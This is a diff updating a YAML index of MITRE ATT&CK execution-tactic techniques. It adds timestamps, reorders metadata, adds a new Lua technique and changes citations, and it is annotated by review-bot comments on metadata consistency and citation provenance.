x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -26180,7 +26501,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26228,7 +26549,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -26261,12 +26582,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26327,8 +26647,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
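Review bot: The `Github PSAttack` citation now links to `github.com/Exploit-install/PSAttack-1`, a repository under a different account, while the description still credits Haight, J. as the author and the original `jaredhaight/PSAttack` URL is dropped. If the author's repository is gone, prefer an archived copy of the original (or say in the description that this is a mirror) rather than pointing readers at an unvetted fork under another owner.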
@@ -26350,12 +26671,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26433,14 +26753,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26498,36 +26817,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
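Review bot: The whole T1559 metadata block (platforms, domains, markings, id, type, created, external_references) is deleted here only to be re-added lower in the same object in the following hunk, so the diff reads as a deletion when it is a key reorder. If this index is generated, emitting keys in a stable order would turn such blocks into no-ops and leave only the real changes, such as the `modified` bump, visible to reviewers.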
@@ -26548,25 +26842,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
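Review bot: `x_mitre_permissions_required` (Administrator/User/SYSTEM) is dropped from T1559 with no replacement, alongside the `x_mitre_attack_spec_version` move from 2.1.0 to 3.2.0 and the `x_mitre_version` bump from 1.2 to 1.3; that is consistent with the field being retired in the newer spec, but T1204.003 further down keeps the same field, so the file ends up mixed. The new T1059.011 (Lua) entry also ships with `x_mitre_detection: ''` and `atomic_tests: []`, so the index now lists a technique with neither detection guidance nor tests; fine for a placeholder, but worth calling out in the commit message.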
@@ -26595,7 +26974,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
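Review bot: The `modified` timestamp for T1204.003 moves backwards, from 2022-04-25 to 2021-08-26, while every other technique in this patch moves forward to a 2024 date. A regressing modification time usually means the object was taken from an older bundle than the rest; confirm the source before merging, because a consumer that compares `modified` to decide whether to refresh an entry will skip this one.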
@@ -26622,30 +27001,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
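Review bot: T1204.003 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` with no replacement anywhere in this hunk, whereas the other restructured techniques (T1203 directly below, T1559, T1569) come out with `x_mitre_attack_spec_version: 3.2.0`; it also keeps `x_mitre_permissions_required: - User`, which the others drop. Together with the `modified` regression in the previous hunk this looks like a stale copy of the T1204.003 object; regenerate it from the same bundle as the rest.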
@@ -26662,9 +27023,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -26672,21 +27034,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
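Review bot: T1203 gains two data sources (`'File: File Modification'`, `'Network Traffic: Network Traffic Flow'`) and `x_mitre_remote_support: false` is carried over, but `x_mitre_version` is removed and re-added unchanged at '1.4'. Other techniques in this patch that changed content got a bump (T1559 and T1569 both go 1.2 to 1.3); confirm whether a data-source change is meant to leave the version alone here or whether the bump was missed.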
@@ -26736,28 +27114,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -26768,32 +27129,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -26836,12 +27209,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26898,11 +27270,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26967,14 +27338,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26995,14 +27365,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
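Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted between `kill_chain_phases` and `x_mitre_contributors` for T1648 (and `x_mitre_modified_by_ref` lands after `x_mitre_is_subtechnique` in the next hunk), while every other technique in this patch keeps both keys together at the end of the object after `object_marking_refs`. The T1648 object's key order is out of step with the rest of the file; if the generator is supposed to emit keys in a fixed order, this one was serialized differently and should be regenerated.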
@@ -27011,16 +27386,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
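Review bot: The platform rename from `Office 365` to `Office Suite` changes a literal that platform-specific indexes and filters key on; any consumer that selects techniques by the `Office 365` string will silently lose T1648 after this change. Check that the per-platform index files are regenerated with the new name in the same change, and that nothing else in the repo still filters on the old value.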
@@ -27046,6 +27423,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
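Review bot: Both new citations are dated `(n.d.)`, yet the `OWN-CERT Google App Script 2024` source_name itself carries a year, and the HackTricks entry points at a wiki page that changes over time. Record the publication date where the page gives one, and for the wiki consider an archived URL, since the retrieval date is the only stable anchor the entry currently has.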
@@ -27060,29 +27445,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -27095,25 +27461,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
